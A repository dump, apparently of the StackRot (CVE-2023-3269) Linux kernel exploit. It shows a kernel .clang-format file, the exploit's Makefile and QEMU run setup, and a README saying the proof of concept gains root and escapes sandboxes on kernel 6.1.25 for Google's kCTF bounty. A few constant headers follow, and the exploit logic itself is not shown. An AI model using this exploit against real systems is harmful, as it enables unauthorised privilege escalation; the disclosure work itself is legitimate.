| DisableFormat: false 64 | ExperimentalAutoDetectBinPacking: false 65 | FixNamespaceComments: false 66 | 67 | # Taken from: 68 | # git grep -h '^#define [^[:space:]]*for_each[^[:space:]]*(' include/ tools/ \ 69 | # | sed "s,^#define \([^[:space:]]*for_each[^[:space:]]*\)(.*$, - '\1'," \ 70 | # | LC_ALL=C sort -u 71 | ForEachMacros: 72 | - '__ata_qc_for_each' 73 | - '__bio_for_each_bvec' 74 | - '__bio_for_each_segment' 75 | - '__evlist__for_each_entry' 76 | - '__evlist__for_each_entry_continue' 77 | - '__evlist__for_each_entry_from' 78 | - '__evlist__for_each_entry_reverse' 79 | - '__evlist__for_each_entry_safe' 80 | - '__for_each_mem_range' 81 | - '__for_each_mem_range_rev' 82 | - '__for_each_thread' 83 | - '__hlist_for_each_rcu' 84 | - '__map__for_each_symbol_by_name' 85 | - '__perf_evlist__for_each_entry' 86 | - '__perf_evlist__for_each_entry_reverse' 87 | - '__perf_evlist__for_each_entry_safe' 88 | - '__rq_for_each_bio' 89 | - '__shost_for_each_device' 90 | - 'apei_estatus_for_each_section' 91 | - 'ata_for_each_dev' 92 | - 'ata_for_each_link' 93 | - 'ata_qc_for_each' 94 | - 'ata_qc_for_each_raw' 95 | - 'ata_qc_for_each_with_internal' 96 | - 'ax25_for_each' 97 | - 'ax25_uid_for_each' 98 | - 'bio_for_each_bvec' 99 | - 'bio_for_each_bvec_all' 100 | - 'bio_for_each_folio_all' 101 | - 'bio_for_each_integrity_vec' 102 | - 'bio_for_each_segment' 103 | - 'bio_for_each_segment_all' 104 | - 'bio_list_for_each' 105 | - 'bip_for_each_vec' 106 | - 'bond_for_each_slave' 107 | - 'bond_for_each_slave_rcu' 108 | - 'bpf__perf_for_each_map' 109 | - 'bpf__perf_for_each_map_named' 110 | - 'bpf_for_each_spilled_reg' 111 | - 'bpf_object__for_each_map' 112 | - 'bpf_object__for_each_program' 113 | - 'bpf_object__for_each_safe' 114 | - 'bpf_perf_object__for_each' 115 | - 'btree_for_each_safe128' 116 | - 'btree_for_each_safe32' 117 | - 'btree_for_each_safe64' 118 | - 'btree_for_each_safel' 119 | - 'card_for_each_dev' 120 | - 'cgroup_taskset_for_each' 121 | - 
'cgroup_taskset_for_each_leader' 122 | - 'cpufreq_for_each_efficient_entry_idx' 123 | - 'cpufreq_for_each_entry' 124 | - 'cpufreq_for_each_entry_idx' 125 | - 'cpufreq_for_each_valid_entry' 126 | - 'cpufreq_for_each_valid_entry_idx' 127 | - 'css_for_each_child' 128 | - 'css_for_each_descendant_post' 129 | - 'css_for_each_descendant_pre' 130 | - 'damon_for_each_region' 131 | - 'damon_for_each_region_safe' 132 | - 'damon_for_each_scheme' 133 | - 'damon_for_each_scheme_safe' 134 | - 'damon_for_each_target' 135 | - 'damon_for_each_target_safe' 136 | - 'data__for_each_file' 137 | - 'data__for_each_file_new' 138 | - 'data__for_each_file_start' 139 | - 'device_for_each_child_node' 140 | - 'displayid_iter_for_each' 141 | - 'dma_fence_array_for_each' 142 | - 'dma_fence_chain_for_each' 143 | - 'dma_fence_unwrap_for_each' 144 | - 'dma_resv_for_each_fence' 145 | - 'dma_resv_for_each_fence_unlocked' 146 | - 'do_for_each_ftrace_op' 147 | - 'drm_atomic_crtc_for_each_plane' 148 | - 'drm_atomic_crtc_state_for_each_plane' 149 | - 'drm_atomic_crtc_state_for_each_plane_state' 150 | - 'drm_atomic_for_each_plane_damage' 151 | - 'drm_client_for_each_connector_iter' 152 | - 'drm_client_for_each_modeset' 153 | - 'drm_connector_for_each_possible_encoder' 154 | - 'drm_for_each_bridge_in_chain' 155 | - 'drm_for_each_connector_iter' 156 | - 'drm_for_each_crtc' 157 | - 'drm_for_each_crtc_reverse' 158 | - 'drm_for_each_encoder' 159 | - 'drm_for_each_encoder_mask' 160 | - 'drm_for_each_fb' 161 | - 'drm_for_each_legacy_plane' 162 | - 'drm_for_each_plane' 163 | - 'drm_for_each_plane_mask' 164 | - 'drm_for_each_privobj' 165 | - 'drm_mm_for_each_hole' 166 | - 'drm_mm_for_each_node' 167 | - 'drm_mm_for_each_node_in_range' 168 | - 'drm_mm_for_each_node_safe' 169 | - 'dsa_switch_for_each_available_port' 170 | - 'dsa_switch_for_each_cpu_port' 171 | - 'dsa_switch_for_each_port' 172 | - 'dsa_switch_for_each_port_continue_reverse' 173 | - 'dsa_switch_for_each_port_safe' 174 | - 
'dsa_switch_for_each_user_port' 175 | - 'dsa_tree_for_each_user_port' 176 | - 'dso__for_each_symbol' 177 | - 'dsos__for_each_with_build_id' 178 | - 'elf_hash_for_each_possible' 179 | - 'elf_section__for_each_rel' 180 | - 'elf_section__for_each_rela' 181 | - 'elf_symtab__for_each_symbol' 182 | - 'evlist__for_each_cpu' 183 | - 'evlist__for_each_entry' 184 | - 'evlist__for_each_entry_continue' 185 | - 'evlist__for_each_entry_from' 186 | - 'evlist__for_each_entry_reverse' 187 | - 'evlist__for_each_entry_safe' 188 | - 'flow_action_for_each' 189 | - 'for_each_acpi_dev_match' 190 | - 'for_each_active_dev_scope' 191 | - 'for_each_active_drhd_unit' 192 | - 'for_each_active_iommu' 193 | - 'for_each_active_route' 194 | - 'for_each_aggr_pgid' 195 | - 'for_each_available_child_of_node' 196 | - 'for_each_bench' 197 | - 'for_each_bio' 198 | - 'for_each_board_func_rsrc' 199 | - 'for_each_btf_ext_rec' 200 | - 'for_each_btf_ext_sec' 201 | - 'for_each_bvec' 202 | - 'for_each_card_auxs' 203 | - 'for_each_card_auxs_safe' 204 | - 'for_each_card_components' 205 | - 'for_each_card_dapms' 206 | - 'for_each_card_pre_auxs' 207 | - 'for_each_card_prelinks' 208 | - 'for_each_card_rtds' 209 | - 'for_each_card_rtds_safe' 210 | - 'for_each_card_widgets' 211 | - 'for_each_card_widgets_safe' 212 | - 'for_each_cgroup_storage_type' 213 | - 'for_each_child_of_node' 214 | - 'for_each_clear_bit' 215 | - 'for_each_clear_bit_from' 216 | - 'for_each_clear_bitrange' 217 | - 'for_each_clear_bitrange_from' 218 | - 'for_each_cmd' 219 | - 'for_each_cmsghdr' 220 | - 'for_each_collection' 221 | - 'for_each_comp_order' 222 | - 'for_each_compatible_node' 223 | - 'for_each_component_dais' 224 | - 'for_each_component_dais_safe' 225 | - 'for_each_console' 226 | - 'for_each_console_srcu' 227 | - 'for_each_cpu' 228 | - 'for_each_cpu_and' 229 | - 'for_each_cpu_wrap' 230 | - 'for_each_dapm_widgets' 231 | - 'for_each_dedup_cand' 232 | - 'for_each_dev_addr' 233 | - 'for_each_dev_scope' 234 | - 'for_each_dma_cap_mask' 235 | 
- 'for_each_dpcm_be' 236 | - 'for_each_dpcm_be_rollback' 237 | - 'for_each_dpcm_be_safe' 238 | - 'for_each_dpcm_fe' 239 | - 'for_each_drhd_unit' 240 | - 'for_each_dss_dev' 241 | - 'for_each_efi_memory_desc' 242 | - 'for_each_efi_memory_desc_in_map' 243 | - 'for_each_element' 244 | - 'for_each_element_extid' 245 | - 'for_each_element_id' 246 | - 'for_each_endpoint_of_node' 247 | - 'for_each_event' 248 | - 'for_each_event_tps' 249 | - 'for_each_evictable_lru' 250 | - 'for_each_fib6_node_rt_rcu' 251 | - 'for_each_fib6_walker_rt' 252 | - 'for_each_free_mem_pfn_range_in_zone' 253 | - 'for_each_free_mem_pfn_range_in_zone_from' 254 | - 'for_each_free_mem_range' 255 | - 'for_each_free_mem_range_reverse' 256 | - 'for_each_func_rsrc' 257 | - 'for_each_group_device' 258 | - 'for_each_group_evsel' 259 | - 'for_each_group_member' 260 | - 'for_each_hstate' 261 | - 'for_each_if' 262 | - 'for_each_inject_fn' 263 | - 'for_each_insn' 264 | - 'for_each_insn_prefix' 265 | - 'for_each_intid' 266 | - 'for_each_iommu' 267 | - 'for_each_ip_tunnel_rcu' 268 | - 'for_each_irq_nr' 269 | - 'for_each_lang' 270 | - 'for_each_link_codecs' 271 | - 'for_each_link_cpus' 272 | - 'for_each_link_platforms' 273 | - 'for_each_lru' 274 | - 'for_each_matching_node' 275 | - 'for_each_matching_node_and_match' 276 | - 'for_each_mem_pfn_range' 277 | - 'for_each_mem_range' 278 | - 'for_each_mem_range_rev' 279 | - 'for_each_mem_region' 280 | - 'for_each_member' 281 | - 'for_each_memory' 282 | - 'for_each_migratetype_order' 283 | - 'for_each_missing_reg' 284 | - 'for_each_net' 285 | - 'for_each_net_continue_reverse' 286 | - 'for_each_net_rcu' 287 | - 'for_each_netdev' 288 | - 'for_each_netdev_continue' 289 | - 'for_each_netdev_continue_rcu' 290 | - 'for_each_netdev_continue_reverse' 291 | - 'for_each_netdev_feature' 292 | - 'for_each_netdev_in_bond_rcu' 293 | - 'for_each_netdev_rcu' 294 | - 'for_each_netdev_reverse' 295 | - 'for_each_netdev_safe' 296 | - 'for_each_new_connector_in_state' 297 | - 
'for_each_new_crtc_in_state' 298 | - 'for_each_new_mst_mgr_in_state' 299 | - 'for_each_new_plane_in_state' 300 | - 'for_each_new_plane_in_state_reverse' 301 | - 'for_each_new_private_obj_in_state' 302 | - 'for_each_new_reg' 303 | - 'for_each_node' 304 | - 'for_each_node_by_name' 305 | - 'for_each_node_by_type' 306 | - 'for_each_node_mask' 307 | - 'for_each_node_state' 308 | - 'for_each_node_with_cpus' 309 | - 'for_each_node_with_property' 310 | - 'for_each_nonreserved_multicast_dest_pgid' 311 | - 'for_each_of_allnodes' 312 | - 'for_each_of_allnodes_from' 313 | - 'for_each_of_cpu_node' 314 | - 'for_each_of_pci_range' 315 | - 'for_each_old_connector_in_state' 316 | - 'for_each_old_crtc_in_state' 317 | - 'for_each_old_mst_mgr_in_state' 318 | - 'for_each_old_plane_in_state' 319 | - 'for_each_old_private_obj_in_state' 320 | - 'for_each_oldnew_connector_in_state' 321 | - 'for_each_oldnew_crtc_in_state' 322 | - 'for_each_oldnew_mst_mgr_in_state' 323 | - 'for_each_oldnew_plane_in_state' 324 | - 'for_each_oldnew_plane_in_state_reverse' 325 | - 'for_each_oldnew_private_obj_in_state' 326 | - 'for_each_online_cpu' 327 | - 'for_each_online_node' 328 | - 'for_each_online_pgdat' 329 | - 'for_each_path' 330 | - 'for_each_pci_bridge' 331 | - 'for_each_pci_dev' 332 | - 'for_each_pcm_streams' 333 | - 'for_each_physmem_range' 334 | - 'for_each_populated_zone' 335 | - 'for_each_possible_cpu' 336 | - 'for_each_present_cpu' 337 | - 'for_each_prime_number' 338 | - 'for_each_prime_number_from' 339 | - 'for_each_probe_cache_entry' 340 | - 'for_each_process' 341 | - 'for_each_process_thread' 342 | - 'for_each_prop_codec_conf' 343 | - 'for_each_prop_dai_codec' 344 | - 'for_each_prop_dai_cpu' 345 | - 'for_each_prop_dlc_codecs' 346 | - 'for_each_prop_dlc_cpus' 347 | - 'for_each_prop_dlc_platforms' 348 | - 'for_each_property_of_node' 349 | - 'for_each_reg' 350 | - 'for_each_reg_filtered' 351 | - 'for_each_registered_fb' 352 | - 'for_each_requested_gpio' 353 | - 'for_each_requested_gpio_in_range' 
354 | - 'for_each_reserved_mem_range' 355 | - 'for_each_reserved_mem_region' 356 | - 'for_each_rtd_codec_dais' 357 | - 'for_each_rtd_components' 358 | - 'for_each_rtd_cpu_dais' 359 | - 'for_each_rtd_dais' 360 | - 'for_each_script' 361 | - 'for_each_sec' 362 | - 'for_each_set_bit' 363 | - 'for_each_set_bit_from' 364 | - 'for_each_set_bitrange' 365 | - 'for_each_set_bitrange_from' 366 | - 'for_each_set_clump8' 367 | - 'for_each_sg' 368 | - 'for_each_sg_dma_page' 369 | - 'for_each_sg_page' 370 | - 'for_each_sgtable_dma_page' 371 | - 'for_each_sgtable_dma_sg' 372 | - 'for_each_sgtable_page' 373 | - 'for_each_sgtable_sg' 374 | - 'for_each_shell_test' 375 | - 'for_each_sibling_event' 376 | - 'for_each_subelement' 377 | - 'for_each_subelement_extid' 378 | - 'for_each_subelement_id' 379 | - 'for_each_sublist' 380 | - 'for_each_subsystem' 381 | - 'for_each_supported_activate_fn' 382 | - 'for_each_supported_inject_fn' 383 | - 'for_each_test' 384 | - 'for_each_thread' 385 | - 'for_each_token' 386 | - 'for_each_unicast_dest_pgid' 387 | - 'for_each_vsi' 388 | - 'for_each_wakeup_source' 389 | - 'for_each_zone' 390 | - 'for_each_zone_zonelist' 391 | - 'for_each_zone_zonelist_nodemask' 392 | - 'func_for_each_insn' 393 | - 'fwnode_for_each_available_child_node' 394 | - 'fwnode_for_each_child_node' 395 | - 'fwnode_graph_for_each_endpoint' 396 | - 'gadget_for_each_ep' 397 | - 'genradix_for_each' 398 | - 'genradix_for_each_from' 399 | - 'hash_for_each' 400 | - 'hash_for_each_possible' 401 | - 'hash_for_each_possible_rcu' 402 | - 'hash_for_each_possible_rcu_notrace' 403 | - 'hash_for_each_possible_safe' 404 | - 'hash_for_each_rcu' 405 | - 'hash_for_each_safe' 406 | - 'hashmap__for_each_entry' 407 | - 'hashmap__for_each_entry_safe' 408 | - 'hashmap__for_each_key_entry' 409 | - 'hashmap__for_each_key_entry_safe' 410 | - 'hctx_for_each_ctx' 411 | - 'hists__for_each_format' 412 | - 'hists__for_each_sort_list' 413 | - 'hlist_bl_for_each_entry' 414 | - 'hlist_bl_for_each_entry_rcu' 415 | - 
'hlist_bl_for_each_entry_safe' 416 | - 'hlist_for_each' 417 | - 'hlist_for_each_entry' 418 | - 'hlist_for_each_entry_continue' 419 | - 'hlist_for_each_entry_continue_rcu' 420 | - 'hlist_for_each_entry_continue_rcu_bh' 421 | - 'hlist_for_each_entry_from' 422 | - 'hlist_for_each_entry_from_rcu' 423 | - 'hlist_for_each_entry_rcu' 424 | - 'hlist_for_each_entry_rcu_bh' 425 | - 'hlist_for_each_entry_rcu_notrace' 426 | - 'hlist_for_each_entry_safe' 427 | - 'hlist_for_each_entry_srcu' 428 | - 'hlist_for_each_safe' 429 | - 'hlist_nulls_for_each_entry' 430 | - 'hlist_nulls_for_each_entry_from' 431 | - 'hlist_nulls_for_each_entry_rcu' 432 | - 'hlist_nulls_for_each_entry_safe' 433 | - 'i3c_bus_for_each_i2cdev' 434 | - 'i3c_bus_for_each_i3cdev' 435 | - 'idr_for_each_entry' 436 | - 'idr_for_each_entry_continue' 437 | - 'idr_for_each_entry_continue_ul' 438 | - 'idr_for_each_entry_ul' 439 | - 'in_dev_for_each_ifa_rcu' 440 | - 'in_dev_for_each_ifa_rtnl' 441 | - 'inet_bind_bucket_for_each' 442 | - 'inet_lhash2_for_each_icsk' 443 | - 'inet_lhash2_for_each_icsk_continue' 444 | - 'inet_lhash2_for_each_icsk_rcu' 445 | - 'interval_tree_for_each_double_span' 446 | - 'interval_tree_for_each_span' 447 | - 'intlist__for_each_entry' 448 | - 'intlist__for_each_entry_safe' 449 | - 'iopt_for_each_contig_area' 450 | - 'kcore_copy__for_each_phdr' 451 | - 'key_for_each' 452 | - 'key_for_each_safe' 453 | - 'klp_for_each_func' 454 | - 'klp_for_each_func_safe' 455 | - 'klp_for_each_func_static' 456 | - 'klp_for_each_object' 457 | - 'klp_for_each_object_safe' 458 | - 'klp_for_each_object_static' 459 | - 'kunit_suite_for_each_test_case' 460 | - 'kvm_for_each_memslot' 461 | - 'kvm_for_each_memslot_in_gfn_range' 462 | - 'kvm_for_each_vcpu' 463 | - 'libbpf_nla_for_each_attr' 464 | - 'list_for_each' 465 | - 'list_for_each_codec' 466 | - 'list_for_each_codec_safe' 467 | - 'list_for_each_continue' 468 | - 'list_for_each_entry' 469 | - 'list_for_each_entry_continue' 470 | - 'list_for_each_entry_continue_rcu' 
471 | - 'list_for_each_entry_continue_reverse' 472 | - 'list_for_each_entry_from' 473 | - 'list_for_each_entry_from_rcu' 474 | - 'list_for_each_entry_from_reverse' 475 | - 'list_for_each_entry_lockless' 476 | - 'list_for_each_entry_rcu' 477 | - 'list_for_each_entry_reverse' 478 | - 'list_for_each_entry_safe' 479 | - 'list_for_each_entry_safe_continue' 480 | - 'list_for_each_entry_safe_from' 481 | - 'list_for_each_entry_safe_reverse' 482 | - 'list_for_each_entry_srcu' 483 | - 'list_for_each_from' 484 | - 'list_for_each_prev' 485 | - 'list_for_each_prev_safe' 486 | - 'list_for_each_safe' 487 | - 'llist_for_each' 488 | - 'llist_for_each_entry' 489 | - 'llist_for_each_entry_safe' 490 | - 'llist_for_each_safe' 491 | - 'map__for_each_symbol' 492 | - 'map__for_each_symbol_by_name' 493 | - 'map_for_each_event' 494 | - 'map_for_each_metric' 495 | - 'maps__for_each_entry' 496 | - 'maps__for_each_entry_safe' 497 | - 'mci_for_each_dimm' 498 | - 'media_device_for_each_entity' 499 | - 'media_device_for_each_intf' 500 | - 'media_device_for_each_link' 501 | - 'media_device_for_each_pad' 502 | - 'msi_for_each_desc' 503 | - 'nanddev_io_for_each_page' 504 | - 'netdev_for_each_lower_dev' 505 | - 'netdev_for_each_lower_private' 506 | - 'netdev_for_each_lower_private_rcu' 507 | - 'netdev_for_each_mc_addr' 508 | - 'netdev_for_each_uc_addr' 509 | - 'netdev_for_each_upper_dev_rcu' 510 | - 'netdev_hw_addr_list_for_each' 511 | - 'nft_rule_for_each_expr' 512 | - 'nla_for_each_attr' 513 | - 'nla_for_each_nested' 514 | - 'nlmsg_for_each_attr' 515 | - 'nlmsg_for_each_msg' 516 | - 'nr_neigh_for_each' 517 | - 'nr_neigh_for_each_safe' 518 | - 'nr_node_for_each' 519 | - 'nr_node_for_each_safe' 520 | - 'of_for_each_phandle' 521 | - 'of_property_for_each_string' 522 | - 'of_property_for_each_u32' 523 | - 'pci_bus_for_each_resource' 524 | - 'pci_dev_for_each_resource' 525 | - 'pcl_for_each_chunk' 526 | - 'pcl_for_each_segment' 527 | - 'pcm_for_each_format' 528 | - 'perf_config_items__for_each_entry' 
529 | - 'perf_config_sections__for_each_entry' 530 | - 'perf_config_set__for_each_entry' 531 | - 'perf_cpu_map__for_each_cpu' 532 | - 'perf_evlist__for_each_entry' 533 | - 'perf_evlist__for_each_entry_reverse' 534 | - 'perf_evlist__for_each_entry_safe' 535 | - 'perf_evlist__for_each_evsel' 536 | - 'perf_evlist__for_each_mmap' 537 | - 'perf_hpp_list__for_each_format' 538 | - 'perf_hpp_list__for_each_format_safe' 539 | - 'perf_hpp_list__for_each_sort_list' 540 | - 'perf_hpp_list__for_each_sort_list_safe' 541 | - 'perf_pmu__for_each_hybrid_pmu' 542 | - 'ping_portaddr_for_each_entry' 543 | - 'ping_portaddr_for_each_entry_rcu' 544 | - 'plist_for_each' 545 | - 'plist_for_each_continue' 546 | - 'plist_for_each_entry' 547 | - 'plist_for_each_entry_continue' 548 | - 'plist_for_each_entry_safe' 549 | - 'plist_for_each_safe' 550 | - 'pnp_for_each_card' 551 | - 'pnp_for_each_dev' 552 | - 'protocol_for_each_card' 553 | - 'protocol_for_each_dev' 554 | - 'queue_for_each_hw_ctx' 555 | - 'radix_tree_for_each_slot' 556 | - 'radix_tree_for_each_tagged' 557 | - 'rb_for_each' 558 | - 'rbtree_postorder_for_each_entry_safe' 559 | - 'rdma_for_each_block' 560 | - 'rdma_for_each_port' 561 | - 'rdma_umem_for_each_dma_block' 562 | - 'resort_rb__for_each_entry' 563 | - 'resource_list_for_each_entry' 564 | - 'resource_list_for_each_entry_safe' 565 | - 'rhl_for_each_entry_rcu' 566 | - 'rhl_for_each_rcu' 567 | - 'rht_for_each' 568 | - 'rht_for_each_entry' 569 | - 'rht_for_each_entry_from' 570 | - 'rht_for_each_entry_rcu' 571 | - 'rht_for_each_entry_rcu_from' 572 | - 'rht_for_each_entry_safe' 573 | - 'rht_for_each_from' 574 | - 'rht_for_each_rcu' 575 | - 'rht_for_each_rcu_from' 576 | - 'rq_for_each_bvec' 577 | - 'rq_for_each_segment' 578 | - 'rq_list_for_each' 579 | - 'rq_list_for_each_safe' 580 | - 'scsi_for_each_prot_sg' 581 | - 'scsi_for_each_sg' 582 | - 'sctp_for_each_hentry' 583 | - 'sctp_skb_for_each' 584 | - 'sec_for_each_insn' 585 | - 'sec_for_each_insn_continue' 586 | - 
'sec_for_each_insn_from' 587 | - 'shdma_for_each_chan' 588 | - 'shost_for_each_device' 589 | - 'sk_for_each' 590 | - 'sk_for_each_bound' 591 | - 'sk_for_each_entry_offset_rcu' 592 | - 'sk_for_each_from' 593 | - 'sk_for_each_rcu' 594 | - 'sk_for_each_safe' 595 | - 'sk_nulls_for_each' 596 | - 'sk_nulls_for_each_from' 597 | - 'sk_nulls_for_each_rcu' 598 | - 'snd_array_for_each' 599 | - 'snd_pcm_group_for_each_entry' 600 | - 'snd_soc_dapm_widget_for_each_path' 601 | - 'snd_soc_dapm_widget_for_each_path_safe' 602 | - 'snd_soc_dapm_widget_for_each_sink_path' 603 | - 'snd_soc_dapm_widget_for_each_source_path' 604 | - 'strlist__for_each_entry' 605 | - 'strlist__for_each_entry_safe' 606 | - 'sym_for_each_insn' 607 | - 'sym_for_each_insn_continue_reverse' 608 | - 'symbols__for_each_entry' 609 | - 'tb_property_for_each' 610 | - 'tcf_act_for_each_action' 611 | - 'tcf_exts_for_each_action' 612 | - 'udp_portaddr_for_each_entry' 613 | - 'udp_portaddr_for_each_entry_rcu' 614 | - 'usb_hub_for_each_child' 615 | - 'v4l2_device_for_each_subdev' 616 | - 'v4l2_m2m_for_each_dst_buf' 617 | - 'v4l2_m2m_for_each_dst_buf_safe' 618 | - 'v4l2_m2m_for_each_src_buf' 619 | - 'v4l2_m2m_for_each_src_buf_safe' 620 | - 'virtio_device_for_each_vq' 621 | - 'while_for_each_ftrace_op' 622 | - 'xa_for_each' 623 | - 'xa_for_each_marked' 624 | - 'xa_for_each_range' 625 | - 'xa_for_each_start' 626 | - 'xas_for_each' 627 | - 'xas_for_each_conflict' 628 | - 'xas_for_each_marked' 629 | - 'xbc_array_for_each_value' 630 | - 'xbc_for_each_key_value' 631 | - 'xbc_node_for_each_array_value' 632 | - 'xbc_node_for_each_child' 633 | - 'xbc_node_for_each_key_value' 634 | - 'xbc_node_for_each_subkey' 635 | - 'zorro_for_each_dev' 636 | 637 | IncludeBlocks: Preserve 638 | IncludeCategories: 639 | - Regex: '.*' 640 | Priority: 1 641 | IncludeIsMainRegex: '(Test)?$' 642 | IndentCaseLabels: false 643 | IndentGotoLabels: false 644 | IndentPPDirectives: None 645 | IndentWidth: 8 646 | IndentWrappedFunctionNames: false 647 | 
JavaScriptQuotes: Leave 648 | JavaScriptWrapImports: true 649 | KeepEmptyLinesAtTheStartOfBlocks: false 650 | MacroBlockBegin: '' 651 | MacroBlockEnd: '' 652 | MaxEmptyLinesToKeep: 1 653 | NamespaceIndentation: None 654 | ObjCBinPackProtocolList: Auto 655 | ObjCBlockIndentWidth: 8 656 | ObjCSpaceAfterProperty: true 657 | ObjCSpaceBeforeProtocolList: true 658 | 659 | # Taken from git's rules 660 | PenaltyBreakAssignment: 10 661 | PenaltyBreakBeforeFirstCallParameter: 30 662 | PenaltyBreakComment: 10 663 | PenaltyBreakFirstLessLess: 0 664 | PenaltyBreakString: 10 665 | PenaltyExcessCharacter: 100 666 | PenaltyReturnTypeOnItsOwnLine: 60 667 | 668 | PointerAlignment: Right 669 | ReflowComments: false 670 | SortIncludes: false 671 | SortUsingDeclarations: false 672 | SpaceAfterCStyleCast: false 673 | SpaceAfterTemplateKeyword: true 674 | SpaceBeforeAssignmentOperators: true 675 | SpaceBeforeCtorInitializerColon: true 676 | SpaceBeforeInheritanceColon: true 677 | SpaceBeforeParens: ControlStatementsExceptForEachMacros 678 | SpaceBeforeRangeBasedForLoopColon: true 679 | SpaceInEmptyParentheses: false 680 | SpacesBeforeTrailingComments: 1 681 | SpacesInAngles: false 682 | SpacesInContainerLiterals: false 683 | SpacesInCStyleCastParentheses: false 684 | SpacesInParentheses: false 685 | SpacesInSquareBrackets: false 686 | Standard: Cpp03 687 | TabWidth: 8 688 | UseTab: Always 689 | 690 | AlignConsecutiveMacros: true 691 | ... 
692 | -------------------------------------------------------------------------------- /exp/Makefile: -------------------------------------------------------------------------------- 1 | TARGET := ../env/exp/exploit 2 | LINKSCRIPT := linkscript.lds 3 | 4 | CC := gcc 5 | CFLAGS := -fno-asynchronous-unwind-tables -fno-ident -fno-stack-protector \ 6 | -no-pie -s -Os -nostdlib -static -Wl,-T$(LINKSCRIPT) -lgcc -Wall 7 | 8 | MAIN_C := src/main.c 9 | SOURCES := \ 10 | consts/log.h \ 11 | consts/prog_regions.h \ 12 | consts/stack.h \ 13 | consts/paging.h \ 14 | consts/msg.h \ 15 | src/nodes_master_and_use.h \ 16 | src/node_free.c \ 17 | src/nodes_decl.h \ 18 | src/nodes_master_and_free.h \ 19 | src/nodes_master_free_use.h \ 20 | src/main.c \ 21 | src/nodes_free_and_use.h \ 22 | src/node_master.c \ 23 | src/node_use.c \ 24 | sys/uio.h \ 25 | sys/msg.h \ 26 | sysutil/clone.h \ 27 | sysutil/mbarrier.h \ 28 | sysutil/pin_cpu.h \ 29 | utils/string.h 30 | 31 | ECHO := echo -e '\t' 32 | TEE := tee 33 | GREP := grep -oha 34 | 35 | RM := rm -f 36 | 37 | CFMT := clang-format 38 | CFMTFIX := $(CFMT) -i 39 | CFMTCHK := $(CFMT) -n --Werror 40 | 41 | KVM ?= -enable-kvm 42 | 43 | QEMU := qemu-system-x86_64 44 | QFLAGS := \ 45 | -m 3G -smp 2 $(KVM) \ 46 | -kernel ../env/bzImage_upstream_6.1.25 \ 47 | -initrd ../env/initramfs.cpio.gz \ 48 | -append "init=/init console=ttyS0 panic_on_warn=1" \ 49 | -virtfs local,path=../env/exp,mount_tag=exp,security_model=none \ 50 | -nographic -no-reboot 51 | 52 | OUT := ../env/run.out 53 | FLAG := 'flag{[a-zA-Z0-9_-]*}' 54 | 55 | .PHONY: all 56 | all: $(TARGET) 57 | 58 | $(TARGET): $(SOURCES) $(LINKSCRIPT) 59 | @$(ECHO) CC $(TARGET) 60 | @$(CC) -o $(TARGET) $(MAIN_C) $(CFLAGS) 61 | 62 | .PHONY: clean 63 | clean: 64 | @$(ECHO) RM $(TARGET) 65 | @$(RM) $(TARGET) 66 | @$(ECHO) RM $(OUT) 67 | @$(RM) $(OUT) 68 | 69 | .PHONY: fmt 70 | fmt: 71 | @$(ECHO) FMT $(SOURCES) 72 | @$(CFMTFIX) $(SOURCES) 73 | 74 | .PHONY: check 75 | check: 76 | @$(ECHO) CHECK $(SOURCES) 77 | @$(CFMTCHK)
$(SOURCES) 78 | 79 | .PHONY: run 80 | run: $(TARGET) 81 | @$(ECHO) QEMU $(TARGET) 82 | @$(QEMU) $(QFLAGS) | $(TEE) $(OUT) 83 | @$(ECHO) SEARCH FLAG 84 | @$(GREP) $(FLAG) $(OUT) 85 | -------------------------------------------------------------------------------- /exp/README.md: -------------------------------------------------------------------------------- 1 | # Exploiting StackRot (CVE-2023-3269) 2 | 3 | [![GitHub CI](https://github.com/lrh2000/StackRot/actions/workflows/ci.yml/badge.svg)][ci] 4 | 5 | [ci]: https://github.com/lrh2000/StackRot/actions 6 | 7 | This directory contains a proof-of-concept (PoC) exploit for the StackRot bug. 8 | For a detailed explanation of the vulnerability and a walkthrough of how this 9 | exploit was developed, please refer to [this](/). 10 | 11 | The exploit specifically targets Linux kernel version 6.1.25. It is primarily 12 | used to acquire root privileges and escape sandboxes in the Google kCTF VRP 13 | challenge. The kernel image and the kernel configuration can be found 14 | [here](/env). 15 | 16 | The successful execution of the exploit, resulting in the acquisition of root 17 | privileges, is verified by the [GitHub CI][ci], which runs the exploit within 18 | QEMU using the specified kernel image. 19 | 20 | ## Building and running the exploit 21 | 22 | To build the exploit, execute the following command: 23 | ``` 24 | make 25 | ``` 26 | 27 | Provided that QEMU is installed, the exploit can be tested with: 28 | ``` 29 | make run 30 | ``` 31 | If KVM is unavailable, substitute the previous command with: 32 | ``` 33 | make run KVM= 34 | ``` 35 | 36 | The most straightforward way to understand how this exploit operates, without 37 | having to set up a local environment, is to review the GitHub CI runs, which 38 | can be found [here][ci]. 39 | 40 | ## Contributing 41 | 42 | While it's unlikely that many will be interested in contributing code to a PoC 43 | exploit, the contribution guidelines are still presented here.
44 | 45 | Please ensure that the contributed code adheres to the proper formatting 46 | standards. This can be achieved by executing: 47 | ``` 48 | make fmt 49 | ``` 50 | 51 | To verify that the code conforms to the specified formatting, execute: 52 | ``` 53 | make check 54 | ``` 55 | 56 | ## Notes 57 | 58 | Currently, the exploit implementation assumes a two-CPU machine and therefore 59 | expects 16 maple nodes per slab, since the objects-per-slab count depends on 60 | the number of CPUs. This means that the exploit will not work out of the box 61 | if the number of CPUs is not two. However, by adjusting a few parameters, it 62 | should not be difficult to get the exploit to work on any number of CPUs 63 | greater than one. 64 | -------------------------------------------------------------------------------- /exp/consts/log.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #define L_ERROR "\x1B[31m" 4 | #define L_DOING "\x1B[0m" 5 | #define L_DONE "\x1B[32m" 6 | 7 | #define A_SUCC "\\x1B[35m" 8 | #define A_RESET "\\x1B[0m" 9 | -------------------------------------------------------------------------------- /exp/consts/msg.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #define KERNEL_MSGHDR_SIZE (6 * 8) 4 | #define USERSPACE_MSGHDR_SIZE 8 5 | 6 | struct msg_hdr { 7 | unsigned long type; 8 | char data[0]; 9 | }; 10 | -------------------------------------------------------------------------------- /exp/consts/paging.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #define PAGE_SIZE 0x1000UL 4 | #define PAGE_MASK 0x0fffUL 5 | #define PAGE_ALIGN(val) (((val) + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1)) 6 | 7 | #define TASK_SIZE 0x800000000000UL 8 | 9 | #define LEAF_PAGES 512 10 | -------------------------------------------------------------------------------- 